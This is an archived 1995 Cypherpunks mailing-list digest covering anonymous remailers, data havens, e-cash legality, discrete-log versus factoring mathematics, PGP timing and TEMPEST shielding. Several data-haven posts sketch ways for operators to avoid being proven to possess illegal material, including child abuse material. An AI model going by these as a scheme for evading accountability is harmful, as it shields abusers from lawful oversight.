*************************************** Example: My e-mail signature would be: SIGNED noring at netcom.com Jon E. Noring *************************************** 2) Please DON'T include a copy of this petition, nor any other text, in your e-mail message. If you have comments to make, send e-mail to me personally, and NOT to the special petition e-mail signature address. 3) Send your e-mail message containing your signature to the following Internet e-mail address and NOT to me: =========================== cos-petition at netcom.com =========================== 4) Within a few days of receipt of your signature, an automated acknowledgment will be e-mailed to you for e-mail address verification purposes. You do not need to respond or reply to this acknowledgement when you receive it. Thank you for signing this petition! Jon Noring (p.s., send your signature to cos-petition at netcom.com) - -- OmniMedia | The Electronic Bookstore. Come in and browse! Two 1312 Carlton Place | locations: ftp.netcom.com /pub/Om/OmniMedia/books Livermore, CA 94550 | and ftp.awa.com /pub/softlock/pc/products/OmniMedia 510-294-8153 | E-book publishing service follows NWU recommendations. - -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. 
============================================================================== A skydiving school is one in which you MUST be a dropout to graduate - -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== All things being equal, a fat person uses more soap than a thin person. From rishab at dxm.ernet.in Wed Jan 18 18:10:33 1995 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Wed, 18 Jan 95 18:10:33 PST Subject: Lance Rose writes anti-cryptoanarchy in WIRED Message-ID: I've missed recent traffic so forgive me if this has already come up. Lance Rose writes a particularly twisted piece in the Idees Fortes section of WIRED 3.02 (February). His basic premise is that traditional forms of copyright law are sufficient to ensure that the Net poses only limited problems to mass content producers such as Time Warner. I agree with this, as most people feel uncomfortable about 'stealing' however impossible it is to detect. Lance Rose, though, goes on to insist that the reason for the copyright law's strength will be the power of the omnipresent Net Cops (sic).
So that you don't consider him entirely ignorant, he acknowledges the increasing use of anon remailers. However, he adds (repeatedly), "Can't we all use anonymous remailers to keep the Net knee-deep in infringing copies? Nope. Net cops can swiftly clean each new infringement out of the major online markets as soon as it appears." How will they do this so efficiently? By "deploying software agents" net-wide to "search out anonymous infringements." He later admits the possibility of "friend-to-friend" markets, but rejects the possibility of such markets growing out of hand, as "few or none of the participants will know everyone else in the circle" allowing cops to join them undetected (as if the Information Liberation Front would mind giving the _cops_ pirated software). "A symbolic legal attack" every once in a while will scare would-be black-marketeers. Later, he does discuss the hidden costs of acquiring pirated versus genuine stuff - "the time and effort needed to track down pirate dealers [...] who are so deep underground even the cops can't find them." Sheesh. And here we are, post-BlackNet, discussing untraceable paid-for anon-remailers (which exist today on Sameer's c2.org blind server) and data havens. I haven't bothered to hunt for Lance's address, which is not given, but really I thought someone as prominent a SysLawyer as him would be clued in. Nor have I found the time to send WIRED a letter. OTOH maybe ignorance, for LEA-friendly legislators who read WIRED, is bliss? 
Let the sleeping dog lie, etc, just finish your data haven code ;-] ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From meconlen at IntNet.net Wed Jan 18 18:18:30 1995 From: meconlen at IntNet.net (Michael Conlen) Date: Wed, 18 Jan 95 18:18:30 PST Subject: Another problem w/Data Havens... In-Reply-To: Message-ID: On Wed, 18 Jan 1995, Jonathan Cooper wrote: > > If the authorities attempt to indict you for possessing illegal > > information / kiddie porn / whatnot, they have to prove that you > > interfered with the automatic redistribution process and examined the > > contents of the submission. If you in fact did not look at the submission, > > they would have a difficult time doing so. > > Unfortunately I've found that the U.S. government especially can make > your life a living hell if you don't go along with their desires, even if > you're following all the laws. Trumped-up charges. Fake charges. I > wouldn't put much past our government. I think the worst is that the government never seems to be in the mood for giving your computer equipment back to you. Hiding your physical location, being out of the question, (old thread), all the government has to do is drum up suspicion and enough information for a warrant for your computer equipment, then you're screwed out of a system. If you had a system good enough to effectively handle DH's or even remailers, you're out of a good sum of money. Groove On Dude Michael Conlen From wcs at anchor.ho.att.com Wed Jan 18 18:25:16 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Wed, 18 Jan 95 18:25:16 PST Subject: Electronic cash illegal?
Message-ID: <9501190223.AA07519@anchor.ho.att.com> > Within the United States (and most other sovereign states) Hal Finney is > correct to point out that the power to print currency is reserved to the > government. I would think that e-cash is a currency and therefore illegal > TO ISSUE WITHIN the geographical (legal) domain of the US. He didn't say it was illegal to print private banknotes, just taxable. Anybody can issue paper or metal tokens or whatever - the difference with government-issue currency is that they can pass laws saying you must accept it as payment for debts, even though your contract specified repayment in real money instead of private bogons like green paper IOUs or lightweight impure-metal coins with politicians' pictures on them. As far as I know, the legal definition of a "dollar" in the US is still a certain weight of silver, and payment in silver legally satisfies debts; under current silver prices, that probably costs more than a $1 US Federal Reserve Note, so nobody bothers. Bill From bdolan at use.usit.net Wed Jan 18 18:32:30 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Wed, 18 Jan 95 18:32:30 PST Subject: Another problem w/Data Havens... In-Reply-To: Message-ID: I'm not familiar with all aspects of this but one thing argues in favor of hoping this becomes a test case: Scientologists are probably more out of favor than cypherpunks. Brad On Wed, 18 Jan 1995 Ben.Goren at asu.edu wrote: > At 4:33 PM 1/18/95, Paul J. Ste. Marie wrote: > >[. . .] As long as > >some piece of info is considered to be a thought-crime, everyone who accepts > >info from a wide range of sources is at risk. > > We might have a test case right now for part of that idea--the > Scientologists. They're essentially claiming that the various newsgroups > should be shut down because somebody put thoughtcrime on them.
I would > posit that the operator of any automated data transmission/massaging > service is not responsible for the data that passes through her equipment. > Consider, for example, if I used a bang path to route an illicit email note > through, say, apple.com. Does that make Apple Computer responsible for what > I send? > > Tying in with some of Eric's comments, this could be viewed as a > fundamental flaw in the 'net: it's the sender, generally, who initiates and > controls the connection, not the recipient. We could view this as an > advantage: how can you blame me for what somebody else does to my computer > without my knowledge, especially if I have no way to stop it short of > getting off the 'net completely? > > >> ... The service could even be advertised as a different form of timestamping > >>(or notarizing). Not only do you get the file back signed, but you get it > >>back encrypted and signed. ... > > > >That would still be a useful service, however, but it does transfer the risk > >from the DH operator to the encryptor. Since he isn't leaving evidence on a > >hard drive, his window of vulnerability is somewhat less. > > Less to nonexistent. If no human sees it on the encrypting site, no human > can be responsible for it. "They" would have to ban the service outright, > or try to prove that you knew that your site would be used for illicit > purposes. If putting a warning to not export crypto software on an ftp site > is sufficient protection--and, judging from the number of sites which do no > more than that, it is--then a simple statement that the service is not to > be used for any illegal purpose should do fine here. > > > --Paul J. Ste. Marie > > pstemari at well.sf.ca.us, pstemari at erinet.com > > b& > > -- > Ben.Goren at asu.edu, Arizona State University School of Music > Finger ben at tux.music.asu.edu for PGP public key ID 0x875B059.
> > > From wcs at anchor.ho.att.com Wed Jan 18 18:35:04 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Wed, 18 Jan 95 18:35:04 PST Subject: Another problem w/Data Havens... Message-ID: <9501190233.AA07621@anchor.ho.att.com> > I could write a procmail recipe and a script in about an hour to > automatically secret-share-split and redistribute the incoming submission. > If the authorities attempt to indict you for possessing illegal > information / kiddie porn / whatnot, they have to prove that you > interfered with the automatic redistribution process and examined the > contents of the submission. If you in fact did not look at the submission, > they would have a difficult time doing so. The problem with a procmail script, unlike the ugly on-the-fly SMTP-like splitting method I proposed, is that the suspicious message is in your mail system, intact, and if they nail you before you can dispose of it, they can prove you had it. (Even though procmail does stuff quickly, sendmail still accumulates the material before delivering it, doesn't it?) They still have to prove that there's something illegal or forfeiture-supporting about the way you possessed the message, but by then you're hauled into court and your computer is stolen. The Feds argued in the Steve Jackson Games fiasco that intercepting unread mail in mailboxes is different than intercepting it in transit, and while we can hope that will be overturned, it's better not to be the guinea pig. If your machine never has more than a few bits of the message, they can't catch you in possession of the message - they can only argue that bits of it flowed through your machine, and that's much harder to build a case on, and given the abuse the judge gave the Bad Guys in the SJG case, it's probably easy to prevent them from keeping your machine as evidence, or at least get it back. Your paranoia may vary.... 
Bill From wcs at anchor.ho.att.com Wed Jan 18 18:56:30 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Wed, 18 Jan 95 18:56:30 PST Subject: Scientologys Attempts Message-ID: <9501190254.AA07887@anchor.ho.att.com> > > > who has the authority to remove alt. groups? jamesd writes: > Anybody has the power. Nobody has the authority. More precisely, anybody has the power to send a rmgroup message, just like anybody has the power to send a cancel message. Aside from etiquette and ethics, the question is whether most of the news servers out there will respond to them, which is a local decision. The last time I ran a news server was in B News days, so your mileage may vary, but responses to newgroup and rmgroup messages can be turned on and off. I used to leave them turned on; not only did new groups appear on my system without manual intervention, but the Great Renaming took care of itself automatically on my box. > [...] This is a classic case of net abuse. Yep. rmgroup wars happen occasionally on the net, usually about alt.joe.newuser.die.die.die and other spam groups run by (or about) people with more spare time than taste. The difference here is that it's part of an organized group-sponsored censorship attempt, rather than an individual squabble, so it retains some degree of classicity. Bill From eric at remailer.net Wed Jan 18 19:01:47 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 18 Jan 95 19:01:47 PST Subject: On DH public key crypto Message-ID: <199501190301.TAA09049@largo.remailer.net> Diffie and Hellman did have a public key cipher based on matrices in their original paper; they knew at the time it didn't work. This is not the same algorithm as the D-H key exchange protocol.
Eric From nzook at bga.com Wed Jan 18 19:13:01 1995 From: nzook at bga.com (Nathan Zook) Date: Wed, 18 Jan 95 19:13:01 PST Subject: JP vs Homer Message-ID: -----BEGIN PGP SIGNED MESSAGE----- A side note: "The ultimate hacks of Wall Street." Now THERE is an idea... You think Donald Trump could see the usefulness of e*? Ivan Boskey? (sp) To the point: JP's withdrawal, and Homer's thread point to something that I've felt for a while: The classification of our tools as munitions has an important point--they should not be used by children. A.S.R notwithstanding, (such a person has had their childhood robbed) what we are doing is _very serious_. Sometimes we talk about pulling down the entire structure of our governments and economy as if it were a Sunday afternoon parlor exercise, or a pipe dream. It is neither. We are on the verge of a restructuring of our society. Cypherpunk projects are the bleeding edge. Implementation calls for serious, considered efforts. Childish behavior is not only uncalled for, it must be anticipated and prevented, or as a minimum, found and fought. I have long been concerned that the remailers are far too vulnerable to either childish abuse or TLA attacks. The former is reaching the stage of threatening to swamp us, either by resource depletion, or by stigmatizing our efforts. There is little, if anything, we can do to stop a chained, PGP'ed mail bomb, "This is mail bomb number XXX. Boom!" It is therefore in our best interest to not encourage children to send such messages in such a way. I believe Homer's message was erroneous for this reason. We do have considerable interest, however, in maintaining a positive image. Positive image is a multifaceted jewel. We must look to preserve it as much as possible while pursuing our goals. We are capable of controlling mail bombs, for instance, in the following way:

Take an incoming message, capture From: line.
Strip header.
MD5 body.
Add to sorted table [From: MD5(message) date].
Check for repetition of first two fields.
If reps = 1, forward message.
If reps = 2, send message to From: "Possible error. Two copies of message received."
If reps = 0 mod 5, send letter to postmaster at From:. "Possible mailbomb or spam. copies of received from at your site in the past week."
Clear table of entries more than a week old every midnight.

If all remailers did this, then no matter where the net was entered, the messages would be rejected. And spammers/bombers would be spamming/bombing their own postmaster. Probably a bad idea. If not all did it, then add special handling to hit remailer-operator at . This would encourage the operator to auto-magically handle the spam-bomb himself. Dealing with huge files and/or TLA's is a topic for another day. Remember: spook at cia.gov, snitch at fbi.gov, and cracker at nsa.gov are probably all listening, maybe even denning at aol.com. Is it a stretch to consider that _they_ might spam-bomb us, trying to discourage the best? Finger or request keyserver for PGP 2.6.2 (tm) key. PGP<->Mail/News installation incomplete. Factors for modulus are not proven primes. Key may be far weaker than expected. Encode at your own risk. Key ID: 14712B4D 1994/12/26 Nathan H.
Zook Key fingerprint = 44 B3 D8 66 3D 55 1E 2E F8 92 22 A6 33 8C DE 24 From dwa at mirage.svl.trw.com Wed Jan 18 19:39:07 1995 From: dwa at mirage.svl.trw.com (Dana Albrecht) Date: Wed, 18 Jan 95 19:39:07 PST Subject: Factorisation and Discrete Logs (was Re: EE Times on PRZ) Message-ID: <9501190339.AA20854@mirage.svl.trw.com> strick wrote: > > DH uses "discrete log" as the hard problem, and very straightforward > mathematics. > > RSA uses "factoring" as the hard problem, and a very clever back door. > > How do you decide if one is based on the other? > > # public-key technology with Diffie-Hellman public-key in particular, which > # (as I understand it) is not particularly secure. > > It's still up in the air, isn't it, whether the discrete log or > factoring is the harder to crack. My intuition is they're the > same hard. > > I know of no problem with DH that RSA doesn't have similar problems. > > strick It seems to me that factoring a large number is no harder than finding a discrete logarithm. Assume, for the moment, that an efficient method of computing discrete logs has been discovered, rendering systems like Diffie-Hellman key exchange unusable. I contend that RSA is now equally unusable. The following variant of the Pollard p-1 method should provide an efficient factorisation method for an RSA modulus, say N.

Choose, at random, "a" such that gcd(a,N) = 1.

Compute x such that:

a^x = 1 (mod N) [ Discrete log time! ]

Partially factor x; say x = f_1 * f_2 * f_3 ... where f_n is not necessarily prime.

Note that it is usually easy to partially factor a "random" large integer. Simply using trial division up to some limit; or, at worst, pollard rho or pollard p-1 (on x) should suffice. If you're truly unlucky, pick another value for a.

Compute:

M = a^(10000! * f) (mod N)

Where f is some partial factor of x.

gcd(M-1,N) should yield a non-trivial factor of N. If it doesn't, another choice of f and/or a should work.

I'm by no means a professional mathematician, but it seems that this scheme should work. Comments, anyone? Dana W. Albrecht dwa at mirage.svl.trw.com From eric at remailer.net Wed Jan 18 19:39:11 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 18 Jan 95 19:39:11 PST Subject: Key backup (was: How do I know . ..) In-Reply-To: <199501181754.MAA24686@bb.hks.net> Message-ID: <199501190338.TAA09099@largo.remailer.net> From: "Dr. D.C. Williams" Safe deposit boxes, by virtue of their accessibility to law enforcement, are subject to search and seizure under court order and are sealed in certain cases (probate). This makes them likely to be the first place to look when the Feds decide that we can't have keys anymore. I am not designing systems for the paranoid fantasy of an inspection of all safety deposit boxes by government agents in search of contraband. I am interested in designing systems which will fit into business as usual, that are inconspicuous by their prevalence, and which will be a part of ordinary and usual protection of data by cryptographic means. Our goals appear to differ enough to preclude my continuing involvement on this topic. Eric From warlord at MIT.EDU Wed Jan 18 19:40:10 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Wed, 18 Jan 95 19:40:10 PST Subject: Electronic cash illegal?
In-Reply-To: <9501190223.AA07519@anchor.ho.att.com> Message-ID: <9501190336.AA12782@toxicwaste.media.mit.edu> > As far as I know, the legal definition of a "dollar" in the US is still a > certain weight of silver, and payment in silver legally satisfies debts; > under current silver prices, that probably costs more than a > $1 US Federal Reserve Note, so nobody bothers. Uhh, no, US currency does not have any backing. I believe it was Nixon who stopped it, possibly even earlier than him. There _used_ to be Gold- and Silver-backed dollars, but no longer. The US dollar is backed by trust alone, today. -derek From eric at remailer.net Wed Jan 18 19:52:16 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 18 Jan 95 19:52:16 PST Subject: (none) In-Reply-To: Message-ID: <199501190351.TAA09133@largo.remailer.net> From: Brian Beattie I must assume that the actor who spams me or sends me unsolicited email or any email for that matter derives some benefit from this activity or they would not do it. Much tort involves perceived gain by the tortfeasor, but that doesn't make it theft. If I make it clear that I do not wish to receive email from an individual or group and that individual or group continues to send email then I contend that they are using my resources in a way that I have not authorized. So who are you making it clear to, if the parties sending the email are anonymous? Eric From yusuf921 at uidaho.edu Wed Jan 18 20:00:55 1995 From: yusuf921 at uidaho.edu (Syed Yusuf) Date: Wed, 18 Jan 95 20:00:55 PST Subject: FBI and BLACKNET In-Reply-To: Message-ID: On Tue, 17 Jan 1995, Craig Hubley wrote: > Regarding BlackNet, I am not sure that they are not *run* by the FBI, > or NSA, or CIA, MI6, Interpol, or some more mysterious quasi-governmental > entity. The more I think about it the more this theory makes sense. I know how they _could_ have traced me but this doesn't explain all their other "leads" they are following up on and he seemed to imply there were many.
>>> Not to mention entrapment is their MO. <<< What do you say we put the word out? > Craig Hubley Business that runs on knowledge > Craig Hubley & Associates needs software that runs on the Web > craig at passport.ca 416-778-6136 416-778-1965 FAX --Syed From warlord at MIT.EDU Wed Jan 18 20:03:06 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Wed, 18 Jan 95 20:03:06 PST Subject: Factorisation and Discrete Logs (was Re: EE Times on PRZ) In-Reply-To: <9501190339.AA20854@mirage.svl.trw.com> Message-ID: <9501190357.AA12988@toxicwaste.media.mit.edu> > Comments, anyone? You are right... Given talks Ive had with Brian LaMacchia, who broke a version of "Secure SunRPC" (a 192-bit prime), he claims that the difficulty is reducing a D-L problem is about the same amount of computation to factorize an RSA modulus of approximately the same size.. So, within napkin-computation, you are correct. -derek From tcmay at netcom.com Wed Jan 18 20:05:41 1995 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 18 Jan 95 20:05:41 PST Subject: Lance Rose writes anti-cryptoanarchy in WIRED In-Reply-To: Message-ID: <199501190404.UAA24779@netcom6.netcom.com> rishab at dxm.ernet.in wrote: > Sheesh. And here we are, post-BlackNet, discussing untraceable paid-for > anon-remailers (which exist today on Sameer's c2.org blind server) and > data havens. I haven't bothered to hunt for Lance's address, which is not > given, but really I thought someone as prominent a SysLawyer as him would > be clued in. Nor have I found the time to send WIRED a letter. First, I want to know how Rishab, in India, gets "Wired" so early (or why I, right next to Silicon Valley, get it so late). He's mentioned the February issue twice now, and all I have is the January "White Album." Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer" (?). 
When I met him a couple of years ago, he'd just gotten out of jail and was working for the satellite Usenet distribution company (whose name I don't recall, and who I've heard less of than I might've expected to, subjunctively speaking). In any case, there a zillion odd opinions on the Net of a Million Lies. Most of them will vanish without a trace. That's comforting. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From roy at cybrspc.mn.org Wed Jan 18 20:38:55 1995 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Wed, 18 Jan 95 20:38:55 PST Subject: copyright and data havens In-Reply-To: Message-ID: <950118.222008.4k2.rusnews.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, asgaard at sos.sll.se writes: > (by the way, how long might it take to IDEA-encrypt a 2 MB > .zip file? I never tried) Me, neither. Let's find out.... [1] d:\doom>dir tt.zip Volume in drive D is unlabeled Serial number is 0000:13FD Directory of d:\doom\tt.zip tt.zip 2292723 1-18-95 22:06 2,292,723 bytes in 1 file(s) 2,293,760 bytes allocated 4,853,760 bytes free [1] d:\doom>timer^pgp +armor=off +compress=off +textmode=off -c tt.zip ^ timer Timer 1 on: 22:16:16 Pretty Good Privacy(tm) 2.6.2 - Public-key encryption for the masses. (c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 11 Oct 94 Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc. Distributed by the Massachusetts Institute of Technology. Export of this software may be restricted by the U.S. 
government. Current time: 1995/01/19 04:16 GMT You need a pass phrase to encrypt the file. Enter pass phrase: Enter same pass phrase again: Just a moment... Ciphertext file: tt.pgp Timer 1 off: 22:18:42 Elapsed: 0:02:26.05 '+textmode=off' is probably overkill, since PGP recognizes the non-text content. But my config.txt has armor and compress turned on. Compressing almost doubled the time to encrypt, and armor gave me 39 *.asc files. - -- Roy M. Silvernail -- roy at cybrspc.mn.org will do just fine, thanks. "Does that not fit in with your plans?" -- Mr Wiggen, of Ironside and Malone (Monty Python) PGP public key available upon request (send yours) From mpd at netcom.com Wed Jan 18 20:50:57 1995 From: mpd at netcom.com (Mike Duvos) Date: Wed, 18 Jan 95 20:50:57 PST Subject: Factorisation and Discrete Logs In-Reply-To: <9501190357.AA12988@toxicwaste.media.mit.edu> Message-ID: <199501190440.UAA28769@netcom5.netcom.com> Derek Atkins writes: > You are right... Given talks Ive had with Brian LaMacchia, > who broke a version of "Secure SunRPC" (a 192-bit prime), he > claims that the difficulty is reducing a D-L problem is > about the same amount of computation to factorize an RSA > modulus of approximately the same size.. Although DH and RSA are believed to be of approximately equal difficulty given the same number of bits, DH is additionally vulnerable because system designers usually publish an "official" modulus and primitive root for everyone to use, whereas in RSA, everyone has their own key. To mount an attack on PGP, for instance, you must factor a key for each person whose privacy you wish to compromise.
Breaking Sun's published 192 bit DH modulus instantly broke SunRPC on all machines using the protocol. The latter was a lot less work than the former. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From hfinney at shell.portal.com Wed Jan 18 21:04:22 1995 From: hfinney at shell.portal.com (Hal) Date: Wed, 18 Jan 95 21:04:22 PST Subject: Factorisation and Discrete Logs (was Re: EE Times on PRZ) Message-ID: <199501190504.VAA03998@jobe.shell.portal.com> From: dwa at mirage.svl.trw.com (Dana Albrecht) > Choose, at random, "a" such that gcd(a,N) = 1. > > Compute x such that: > > a^x = 1 (mod N) [ Discrete log time! ] DH uses prime moduli, I believe. Solving the DL problem sufficiently to break DH may not let you solve it for composite moduli, not without knowing the factors. Hal From pstemari at erinet.com Wed Jan 18 21:16:33 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Wed, 18 Jan 95 21:16:33 PST Subject: TEMPEST Message-ID: <9501190507.AB17284@eri.erinet.com> At 12:32 PM 1/18/95, Timothy C. May wrote: > ... And if nothing is seen with our $10K of equipment, what does this >prove against an attacker who can easily afford to spend 20 or 30 >times that amount to equip a van? > >Cypherpunks have been exploiting technology that is comparatively >_much cheaper_ and which changes the equation. > > ... In general, for reasons many of us have written about here before, and in >particular, because I think spending $10,000 to prove what we already >know--that RF emissions can be detected and demodulated--is a poor use >of money. That $10K would go a long way to getting PGP Phone finished. ... I'm not sure how encryption changes the equation if that van on the street can read the data off your screen and/or printer. Just as cryptanalysis is a necessary component of good cryptography, some sort of VanEck analysis would seem to be required in order to evaluate the utility of methods to block it.
What exactly would one need to do to block Van Eck monitoring? I've seen computer rooms that were completely lined with copper sheathing. Is it really necessary to go to that extent? Will aluminum foil and power line conditioning handle it? You can't really tell how effective counter-measures are unless you have some way to see what reduction in emitted signal they provide. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From adam at bwh.harvard.edu Wed Jan 18 21:18:16 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Wed, 18 Jan 95 21:18:16 PST Subject: Lance Rose writes anti-cryptoanarchy in WIRED In-Reply-To: <199501190404.UAA24779@netcom6.netcom.com> Message-ID: <199501190516.AAA09260@bwh.harvard.edu> Tim wrote: | rishab at dxm.ernet.in wrote: | | > Sheesh. And here we are, post-BlackNet, discussing untraceable paid-for | > anon-remailers (which exist today on Sameer's c2.org blind server) and | > data havens. I haven't bothered to hunt for Lance's address, which is not | > given, but really I thought someone as prominent a SysLawyer as him would | > be clued in. Nor have I found the time to send WIRED a letter. | | First, I want to know how Rishab, in India, gets "Wired" so early (or | why I, right next to Silicon Valley, get it so late). He's mentioned | the February issue twice now, and all I have is the January "White | Album." He doesn't have to contend with the USPS? (My copy arrived today, quite beat up, and missing most of its white envelope. Sigh.) | Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer" | (?). When I met him a couple of years ago, he'd just gotten out of You're thinking of Len Rose, not Lance Rose. (Assuming this is the L. Rose who features in The Hacker Crackdown.) Regarding Rishab's points about the article, I think its a useful fantasy. Let Lance think that net.cops will win, until the reality proves otherwise. At least he doesn't call for banning remailers. 
Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From tcmay at netcom.com Wed Jan 18 21:43:25 1995 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 18 Jan 95 21:43:25 PST Subject: Lance Rose writes anti-cryptoanarchy in WIRED In-Reply-To: <199501190404.UAA24779@netcom6.netcom.com> Message-ID: <199501190459.UAA26969@netcom12.netcom.com> Timothy C. May wrote: > Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer" > (?). When I met him a couple of years ago, he'd just gotten out of > jail and was working for the satellite Usenet distribution company > (whose name I don't recall, and who I've heard less of than I might've > expected to, subjunctively speaking). Josh Geller reminded me that it may've been Len Rose I was thinking of. Len, Lance, I don't know. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From sdw at lig.net Wed Jan 18 23:52:52 1995 From: sdw at lig.net (Stephen D. Williams) Date: Wed, 18 Jan 95 23:52:52 PST Subject: Lance Rose writes anti-cryptoanarchy in WIRED In-Reply-To: <199501190404.UAA24779@netcom6.netcom.com> Message-ID: ... > Album." > > Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer" > (?). When I met him a couple of years ago, he'd just gotten out of > jail and was working for the satellite Usenet distribution company > (whose name I don't recall, and who I've heard less of than I might've > expected to, subjunctively speaking). Bzzzt.... You're error correction is working overtime... 
That's Len Rose, formerly with Pagesat, currently with barrnet. His offense, BTW, was basically giving the source to ATT login.c to a college kid... Documented somewhat poorly in 'The Hacker Crackdown', Bruce Sterling. > In any case, there a zillion odd opinions on the Net of a Million > Lies. Most of them will vanish without a trace. That's comforting. > > --Tim May Now, my name is one that really should cause collisions... sdw -- Stephen D. Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/sdw Senior Consultant 513-865-9599 FAX/LIG 513.496.5223 OH Page BA Aug94-Feb95 OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430 Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.17Jan95 From tcmay at netcom.com Wed Jan 18 23:57:21 1995 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 18 Jan 95 23:57:21 PST Subject: Lance Rose writes anti-cryptoanarchy in WIRED In-Reply-To: Message-ID: <199501190756.XAA08643@netcom20.netcom.com> Stephen D. Williams wrote: > Bzzzt.... You're error correction is working overtime... > > That's Len Rose, formerly with Pagesat, currently with barrnet. > His offense, BTW, was basically giving the source to ATT login.c > to a college kid... Documented somewhat poorly in 'The Hacker Crackdown', > Bruce Sterling. Enough already! This is the seventh or eighth such correction that's been sent to me, some of them also sent to the list. I understand that errors get picked up promptly by all you eagle-eyes, but enough already. 
Thanks, --Tim May From exabyte!gedora!mikej2 at uunet.uu.net Thu Jan 19 01:12:38 1995 From: exabyte!gedora!mikej2 at uunet.uu.net (Mike Johnson second login) Date: Thu, 19 Jan 95 01:12:38 PST Subject: Multiple symetric cyphers In-Reply-To: <199501121547.AA02187@poboy.b17c.ingr.com> Message-ID: On Thu, 12 Jan 1995, Paul Robichaux wrote: > > But selecting a single cipher is just as much a fixed policy as a > > randomly selected one is. Far better to let the user pick a policy, > > both about sent and accepted ciphers. > > If you do give the user control, what is an acceptable mechanical > implementation? Let's say I have a file encryptor which allows the > user to choose between DES, 3DES, IDEA, Diamond, and RC5. Must I > require the user to tell that program what cypher was used to encrypt > the file she wishes to decrypt? > > Is storing the cypher type as part of the encrypted file a weakness? Perhaps it is. The algorithm set could be part of the key, though... From tcmay at netcom.com Thu Jan 19 01:15:06 1995 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 19 Jan 95 01:15:06 PST Subject: The Remailer Crisis Message-ID: <199501190914.BAA19681@netcom20.netcom.com> I don't think I've used "crisis" in a thread I started, so this tells you what I think. The remailers are stagnating, only very slowly adding important features, and the number is not growing...in fact, it's been shrinking. This, as the remailers are under attack. Editorialists are railing against the dangers of anonymity and remailers, and the "Church of Scientology" is threatening lawsuits against remailer operators unless they block certain newsgroups. (Lots of issues, clever workarounds proposed, etc.) Now whether or not the Church of Scientology, or RSADSI (for the RC4 code remailing), or anyone else could legally _win_ such a case is not the issue. 
Not many remailer operators would be able to mount a defense...they are not, frankly, folks heros as Zimmermann is--and even PRZ is struggling to raise money. Maybe the EFF (ugh) would leap into the fray, but I doubt it. Nope, I fear that the pressures that have driven several remailers to halt operation are just the tip of the iceberg. (Some remailers have quit because of words from their sysadmins, semi-threatening conversations with Brad Templeton--Hi, Brad!--, and so on. Real letters from real lawyers would have a profoundly more chilling effect.) We've debated this stuff many times, but the numbers of remailers are shrinking. Raph Levien summarized the situation nicely in a post to alt.anon-server: "We're down to fifteen remailers now, many of which are unreliable. I would say the remailer net is not in good shape right now. Fortunately, I know of a number of plans to bring new remailers up, as well as restoring old ones." (I hope Raph can share with us soon what some of the plans are, unless he fears revealing this will aid our opponents.) I could see the whole remailer system imploding. A few threatening letters, especially if sent by real lawyers, could demolish the few U.S. sites. And with the Netherlands toying with proposals to ban or limit private encryption, having Holland as the main remaining host for remailers would be rather precarious. We need lots more remailers, in many more countries. What can be done? * We need to get the number of "solid" remailers up from the current dozen or so up into the _hundreds_. * I favor separating the "account that remails" from the "owner of the site," as I have argued in vain in the past. (Example: a willing site gives out or sells many accounts...each is legally separate, and each must be legally challenged. My longer 